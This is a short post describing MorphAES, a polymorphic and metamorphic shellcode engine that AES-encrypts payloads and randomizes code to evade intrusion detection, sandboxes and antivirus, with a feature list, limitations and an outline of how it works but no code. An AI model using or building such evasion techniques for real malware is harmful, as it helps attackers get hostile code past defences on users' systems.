MorphAES - IDPS & SandBox & AntiVirus STEALTH KILLER.

MorphAES – IDPS & SandBox & AntiVirus STEALTH KILLER.

This Post is intended to help understanding and learning how Encryption is used in malware. we don’t expect it to be used in malwares “in practice”. Creating malwares would be illegal. Moreover, this post is not “practical”, since it doesn’t provide a way to ensure file erasure nor a way to pay and communicate keys.

MorphAES is the world’s first polymorphic shellcode/malware engine, with metamorphic properties and capability to bypass sandboxes, which make it undetectable for an IDPS, it’s cross-platform as well and library-independent.
+ Polymorphism (AES encryption)
+ Metamorphism (logic and constants changing)
+ Platform independent (Linux/BSD/Windows)
+ IDPS stealthing (the total number of possible signatures is more the number of atoms in the universe for one given code)
+ Sandbox evasion (special assembly instructions)
+ Realism (no null bytes)
+ Can produce executables (malwares)MorphAES

Dependencies for the morpher:
– Python 2.7 – main engine
– Python Crypto 2.6 – for encryption
Dependencies for the code execution:
– Intel AES-NI – for decryption

Nonetheless, there are some limitations (aka white-hat aspects):
* Shellcode’s maximum length is 240 bytes (I don’t really want to destroy the whole industry (at least for now), but if you’re good at assembly and crypto, it’s technically possible to extend it)
* Execution might lead to unexpected results if you use 8-bit registers (I’m not pretty sure why and how)
* Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
* Unicode null bytes might still work (but who cares?)
* It will surely work on 64-bit Intel processors with AES-NI support, but since all the user’s PCs (like Pentium, Celeron, i3, i5, i7) and the industry’s servers (like Xeon) have it, it’s more a specification, rather than a limitation
* Windows/BSD PoC and executables are in progress…

How it works
+ Shellcode padding with NOPs (since AES is a block cipher)
+ Shellcode encryption with a random key using AES-128-ECB (not the best, but the simplest) – polymorphism
+ Constants randomization & logic changes – metamorphism